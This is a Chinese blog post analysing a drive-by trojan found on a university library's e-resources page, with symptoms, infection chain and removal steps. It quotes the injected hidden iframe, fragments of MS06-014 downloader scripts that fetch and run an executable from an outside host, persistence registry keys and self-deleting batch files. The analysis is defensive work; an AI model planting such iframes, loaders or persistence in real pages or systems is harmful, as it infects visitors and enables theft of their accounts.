• 欢迎访问金刀客博客!
  • 2019,春节快乐!

“窥探”图书馆电子资源主页的木马”妹妹”

病毒分析 admin 6113次浏览 已收录 0个评论

近日需要查几篇文献,也想去看看华农图书馆主页那个该死的病毒还在不?从上学期开始只要进入图书馆主页卡巴就杀猪般狂叫,检测到某某木马.今日一来,哈哈,我的卡巴不叫了,一看源程序,也没了那个框架,看来还有人管事.到电子资源去找几篇文章吧,”嘎嘎”.猪声又起,江湖依旧.四面楚歌,悲凉至极.电子资源可能是图书馆被游览的最多的网页吧,那可是盗QQ的木马啊,如果没有打补丁.不知道又有多少人欲哭无泪,惨不忍睹了!
废话少说,开始了….
中毒现象
查看在%ProgramFiles%\Internet Explorer\Connection Wizard是否有isignup.dll,isignup.sys;如果没有打开IE,而进程里是否有ieplorer.exe在运行;运行-msconfig,是否有kwatlog.exe的存在,如果是那就十之八九中了,另外这个家伙很耗内存,,所以这个木马没前途.

“偷窥”妹妹
打开图书馆电子资源页面http://web.scau.edu.cn/tsg/elect/index.htm.只看见状态栏在”翻江倒海”,与图书馆电子资源页面无关的网页在一一隐藏打开,这时进入%userprofile%\Local Settings\Temporary Internet Files,你会看见这些东东与scau是无关的,

扫下先.p1.htm:Trojan.DL.VBS.Psyme.ce;p1.htm:Trojan.DL.VBS.Agent.r,笨蛋,一个都不免杀.
记事本打开http://web.scau.edu.cn/tsg/elect/index.htm,在源代码末尾加入了

<iframe src=”&lt;a href=&quot;http://www.yxgm78.com/yx.htm&quot; target=&quot;_blank&quot;&gt;http://www.yxgm78.com/yx.htm&lt;/a&gt;” width=”0″ height=”0″ frameborder=”0″ scrolling=”no”></iframe>

打开yx.htm源代码

<script language=”javascript” type=”text/javascript” src=”<a href=”http://js.users.51.la/636252.js” target=”_blank”>http://js.users.51.la/636252.js</a>”></script>

卑鄙,还用”我要拉”统计有多少人中马.
继续打开wz.htm,wu.htm

<iframe src=”p1.htm” width=”0″ height=”0″ border=”0″></iframe>
<iframe src=”p2.htm” width=”0″ height=”0″ border=”0″></iframe>

go on
p1.htm

<script>xinchunkuaile = “http://www.yxgm78.com/mm/mm.exe”t=”32,32,32,32,加密的

^_^,首先祝您新春快乐,看到没,
p2.htm

<script language=”VBScript”>    on error resume next Laoding =”<a href=”http://www.yxgm78.com/mm/mm.exe” target=”_blank”>http://www.yxgm78.com/mm/mm.exe</a>”Set df = document.createElemen(“ob”&Tr4c3&”jec”&Tr4c3&”t”) df.setAttribute

咋这么眼熟啊,仔细瞧瞧,嘎嘎,这不是经典的“ms06014网页木马”吗?晕,现在ms06014网页木马生成器是满天飞啊!看看有没有”MyQQ5372453″,^_^,被换成”Laoding “了.网页被加密可能为了躲避杀毒软件,加密了部分代码.嘻嘻,就是http://www.yxgm78.com/mm/mm.exe么没加密.我要的就是你.
这家伙还真是麻烦,转了这么多弯才进入正题.并且还来个双保险,用2个下载者(p1.htm,p2.htm)搭配,以免妹妹(mm.exe)下不下来,并用”我要拉”统计中马的数量.今天一早就起来看这些玩儿,也没把P1.htm加密的网页解码出来,只知道好像是VBS加密了.如果不加密可能就不知道利用的什么漏洞,补丁就不知道是什么了,哪位仁兄找到了,告诉一声啊;P2.htm则利用ms06014漏洞来下载运行mm.exe.打好相关补丁(附件里有传或去微软下载)就OK.罗唆一句,网上那些测试是否有ms06014漏洞的网页不要乱点!
12点了,啃个鸡腿,听听歌先.
对面的女孩看过来,看过来,看过来,这里的表演很精彩…….
好了,现在就要好好研究这个”妹妹”(mm.exe)了.先DOWNLOAD,哇,5KB,就是传说中的5k下载者吧.扫下先,是trojan-downloader.win32.small.edz.
启动”妹妹”,mm.exe启动IE并修改IE内存,插入IE过防火墙,难怪我没看见防火墙警告消息,^_^
下载

%userprofile%\Local Settings\Temp\mh.exe

copy mh.exe到%WINDOWS%\system32\mh.exe
mh.exe释放

%ProgramFiles%\Internet Explorer\Connection Wizard\isignup.dll
%ProgramFiles%\Internet Explorer\Connection Wizard\isignup.sys

这2个就是盗QQ的.
之后加载驱动isignup.sys,添加ShellExecuteHooks启动项

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]”{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}”=””

添加注册表键值

[HKEY_CLASSES_ROOT\CLSID\{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}\InProcServer32]@=”C:\\Program Files\\Internet Explorer\\Connection Wizard\\isignup.sys””ThreadingModel”=”Apartment”

isignup.sys注入explorer.exe,实现随桌面启动;
下载verclsid.exe,rx.exe和_xiaran.bat到C:\WINDOWS\system32
启动rx.exe

%userprofile%\Local Settings\Temp\wanpacket.dll
%userprofile%\Local Settings\Temp\packet.dll
%userprofile%\Local Settings\Temp\npptools.dll
%userprofile%\Local Settings\Temp\npf.sys
%userprofile%\Local Settings\Temp\ kwatlog.exe
%ProgramFiles%\Internet Explorer\Connection Wizard\icwres.ocx
%WINDOWS%\system32\CatRoot2\tmp.edb

反复添加注册表键值

[HKLM\SYSTEM\CurrentControlSet\Control\Session Manager]
“PendingFileRenameOperations”=”
\??\C:\Program Files\Internet Explorer\Connection Wizard\icwres.ocx
!\??\C:\Program Files\Internet Explorer\Connection Wizard\isignup.sys”

mh.exe进程执行_xiaran.bat,删除自身,
代码如下:

:try
del “C:\WINDOWS\system32\mh.exe”
if exist “C:\WINDOWS\system32\mh.exe” goto try
del %0

d.bat与_xiaran.bat功能相似,不过是删除mm.exe
rx.exe启动kwatlog.exe,
释放

%userprofile%\Local Settings\Temp\h4qrb9v.sys
%userprofile%\Local Settings\Temp\h4c.dll
%userprofile%\Local Settings\Temp\_wpcap_.bat
%userprofile%\Local Settings\Temp\_wpcap_.inf
%WINDOWS%\system32\wincab.sys
%WINDOWS%\system32\tpxhst32

添加自启动

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“ctfmon.exe”=”C:\\WINDOWS\\system32\\ctfmon.exe”
“svc”=”C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\kwatlog.exe”

_wpcap_.bat启动_wpcap_.inf,安装名为Netgroup Packet Filter服务,copy npf.sys %SYSTEMROOT%\system32\drivers\.
_wpcap_.inf

Signature=”$WINDOWS NT$”
[DefaultInstall.Services]
AddService=NPF,,winpcap_svr
[winpcap_svr]
DisplayName=Netgroup Packet Filter
ServiceType=0x1
StartType=3
ErrorControl=1
ServiceBinary=%12%\npf.sys

_wpcap_.bat

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %CD%\_wpcap_.inf
del _wpcap_.inf
copy npf.sys %SYSTEMROOT%\system32\drivers\
del npf.sys
del %0

最后添加tpxhst32到自启动,

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\tpxhst32.exe”=”tpxhst32”

清除办法
如果你会用冰刃,很容易就发现会马脚,
隐藏进程和驱动
危险进程

kwatlog和isignup.dll就是”祸首’
1, 删除下列文件

%WINDOWS%\system32\tpxhst32.exe
%WINDOWS%\system32\verclsid.exe
%WINDOWS%\system32\drivers\npf.sys
%WINDOWS%\system32\drivers\squell.sys
%ProgramFiles%\Internet Explorer\Connection Wizard\isignup.dll
%ProgramFiles%\Internet Explorer\Connection Wizard\isignup.sys
%ProgramFiles%\Internet Explorer\Connection Wizard\icwres.ocx
清空%userprofile%\Local Settings\Temp\

2,删除下列键值

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“svc”=”C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\kwatlog.exe”
[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\tpxhst32.exe”=”tpxhst32″
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]”{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}”=””
[HKEY_CLASSES_ROOT\CLSID\{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}\InProcServer32]@=”C:\\Program Files\\Internet Explorer\\Connection Wizard\\isignup.sys””ThreadingModel”=”Apartment”

3,在注册表查找tpxhst32.exe,kwatlog.exe,删除所有相关值
kwatlog.exe以隐藏进程启动,隐蔽性很好,进程管理器是看不到的.

最后把我截获的程序截图纪念一下,图书馆电子资源主页木马相关程序下载
!

分析补充
p1.htm中的t值时ASCII字符,解码后为


金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明“窥探”图书馆电子资源主页的木马”妹妹”
喜欢 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到